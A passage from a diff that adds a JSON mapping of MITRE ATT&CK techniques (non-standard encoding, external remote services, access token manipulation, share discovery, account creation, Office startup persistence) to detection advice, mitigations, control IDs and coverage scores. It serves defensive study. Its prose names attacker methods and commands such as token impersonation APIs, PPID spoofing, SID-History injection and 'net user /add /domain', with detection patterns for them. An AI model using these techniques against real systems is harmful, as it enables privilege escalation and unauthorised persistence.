(e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1132.002", + "name": "Data Encoding: Non-Standard Encoding", + "url": "https://attack.mitre.org/techniques/T1132/002", + "description": "Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) ", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "cumulative_score": 0.3121019964657143, + "adjusted_score": 0.3121019964657143, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "13.3,13.8" + ], + "nist_controls": [ + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "SC-7", + "SI-3", + "SI-4" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1133", + "name": "External Remote Services", + "description": "Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)\n\nAccess to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.\n\nAccess may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)", + "url": "https://attack.mitre.org/techniques/T1133", + "tactics": [ + "Initial Access", + "Persistence" + ], + "detection": "Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.\n\nWhen authentication is not required to access an exposed remote service, monitor for follow-on activities such as anomalous external use of the exposed API or application.", + "platforms": [ + "Containers", + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Application Log: Application Log Content", + "Logon Session: Logon Session Metadata", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + } + ], + "cumulative_score": 0.7378857142857143, + "adjusted_score": 0.7378857142857143, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [ + "2.3,2.5,3.12,4.1,4.2,4.4,4.8,6.3,6.4,6.5,7.6,7.7,12.2,12.7,12.8,13.5,16.8,18.3,18.5,13.10,16.10" + ], + "nist_controls": [ + "AC-17", + "AC-20", + "AC-23", + "AC-3", + "AC-4", + "AC-6", + "AC-7", + "CM-2", + "CM-6", + "CM-7", + "CM-8", + "IA-2", + "IA-5", + "RA-5", + "SC-46", + "SC-7", + "SI-4", + "SI-7" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1134", + "name": "Access Token Manipulation", + "description": "Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.\n\nAn adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)\n\nAny standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.", + "url": "https://attack.mitre.org/techniques/T1134", + "tactics": [ + "Defense Evasion", + "Privilege Escalation" + ], + "detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. \n\nThere are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., LogonUser (Citation: Microsoft LogonUser), DuplicateTokenEx(Citation: Microsoft DuplicateTokenEx), and ImpersonateLoggedOnUser(Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.\n\nQuery systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)\n\nLook for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.", + "platforms": [ + "Windows" + ], + "data_sources": [ + "Active Directory: Active Directory Object Modification", + "Command: Command Execution", + "Process: OS API Execution", + "Process: Process Creation", + "Process: Process Metadata", + "User Account: User Account Metadata" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1134.001", + "name": "Access Token Manipulation: Token Impersonation/Theft", + "url": "https://attack.mitre.org/techniques/T1134/001", + "description": "Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.\n\nAn adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.", + "detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nAnalysts can also monitor for use of Windows APIs such as DuplicateToken(Ex), ImpersonateLoggedOnUser , and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1134.002", + "name": "Access Token Manipulation: Create Process with Token", + "url": "https://attack.mitre.org/techniques/T1134/002", + "description": "Adversaries may create a new process with a different token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.(Citation: Microsoft RunAs)\n\nCreating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used (ex: gathered via other means such as [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003)).", + "detection": "If an adversary is using a standard command-line shell (i.e. [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003)), analysts may detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command or similar artifacts. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts may detect token manipulation only through careful analysis of user activity, examination of running processes, and correlation with other endpoint and network behavior.\n\nAnalysts can also monitor for use of Windows APIs such as CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1134.003", + "name": "Access Token Manipulation: Make and Impersonate Token", + "url": "https://attack.mitre.org/techniques/T1134/003", + "description": "Adversaries may make and impersonate tokens to escalate privileges and bypass access controls. If an adversary has a username and password but the user is not logged onto the system, the adversary can then create a logon session for the user using the LogonUser function. The function will return a copy of the new session's access token and the adversary can use SetThreadToken to assign the token to a thread.", + "detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.\n\nAnalysts can also monitor for use of Windows APIs such as LogonUser and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1134.004", + "name": "Access Token Manipulation: Parent PID Spoofing", + "url": "https://attack.mitre.org/techniques/T1134/004", + "description": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)\n\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)\n\nExplicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)", + "detection": "Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)\n\nMonitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.", + "mitigations": [] + }, + { + "tid": "T1134.005", + "name": "Access Token Manipulation: SID-History Injection", + "url": "https://attack.mitre.org/techniques/T1134/005", + "description": "Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).\n\nWith Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).", + "detection": "Examine data in user’s SID-History attributes using the PowerShell Get-ADUser cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)\n\nMonitor for Windows API calls to the DsAddSidHistory function. (Citation: Microsoft DsAddSidHistory)", + "mitigations": [ + { + "mid": "M1015", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.", + "url": "https://attack.mitre.org/mitigations/M1015" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 0.5821248026228572, + "adjusted_score": 0.5821248026228572, + "has_car": false, + "has_sigma": false, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "4.1,4.7,5.3,5.4,6.1,6.2,6.8" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CM-5", + "CM-6", + "IA-2" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1135", + "name": "Network Share Discovery", + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \n\nFile sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\\\\\\\remotesystem command. It can also be used to query shared drives on the local system using net share. For macOS, the sharing -l command lists all shared points used for smb services.", + "url": "https://attack.mitre.org/techniques/T1135", + "tactics": [ + "Discovery" + ], + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Process: OS API Execution", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ], + "cumulative_score": 0.24848081564476188, + "adjusted_score": 0.24848081564476188, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [ + "4.1,18.3,18.5" + ], + "nist_controls": [ + "CM-6", + "CM-7", + "SI-4" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1136", + "name": "Create Account", + "description": "Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.\n\nAccounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.", + "url": "https://attack.mitre.org/techniques/T1136", + "tactics": [ + "Persistence" + ], + "detection": "Monitor for processes and command-line parameters associated with account creation, such as net user or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.\n\nCollect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.", + "platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Process: Process Creation", + "User Account: User Account Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1136.001", + "name": "Create Account: Local Account", + "url": "https://attack.mitre.org/techniques/T1136/001", + "description": "Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account.\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.", + "detection": "Monitor for processes and command-line parameters associated with local account creation, such as net user /add , useradd , and dscl -create . Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary.", + "mitigations": [ + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1136.002", + "name": "Create Account: Domain Account", + "url": "https://attack.mitre.org/techniques/T1136/002", + "description": "Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.", + "detection": "Monitor for processes and command-line parameters associated with domain account creation, such as net user /add /domain. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain accounts to detect suspicious accounts that may have been created by an adversary.", + "mitigations": [ + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1136.003", + "name": "Create Account: Cloud Account", + "url": "https://attack.mitre.org/techniques/T1136/003", + "description": "Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)\n\nAdversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.", + "detection": "Collect usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.", + "mitigations": [ + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ], + "cumulative_score": 0.9344039015904759, + "adjusted_score": 0.9344039015904759, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "3.12,4.1,4.2,4.4,4.7,5.3,5.4,6.1,6.2,6.3,6.4,6.5,11.3,11.4,12.2,12.8,18.3,18.5" + ], + "nist_controls": [ + "AC-2", + "AC-20", + "AC-3", + "AC-4", + "AC-5", + "AC-6", + "CM-5", + "CM-6", + "CM-7", + "IA-2", + "IA-5", + "SC-46", + "SC-7", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1137", + "name": "Office Application Startup", + "description": "Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.\n\nA variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)", + "url": "https://attack.mitre.org/techniques/T1137", + "tactics": [ + "Persistence" + ], + "detection": "Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.\n\nMany Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)\n\nMicrosoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)", + "platforms": [ + "Office 365", + "Windows" + ], + "data_sources": [ + "Application Log: Application Log Content", + "Command: Command Execution", + "File: File Creation", + "File: File Modification", + "Module: Module Load", + "Process: Process Creation", + "Windows Registry: Windows Registry Key Creation", + "Windows Registry: Windows Registry Key Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1137.001", + "name": "Office Application Startup: Office Template Macros", + "url": "https://attack.mitre.org/techniques/T1137/001", + "description": "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)\n\nOffice Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) \n\nWord Normal.dotm location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel Personal.xlsb location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAdversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) \n\nAn adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.", + "detection": "Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page) Modification to base templates, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.(Citation: GlobalDotName Jun 2019)", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to 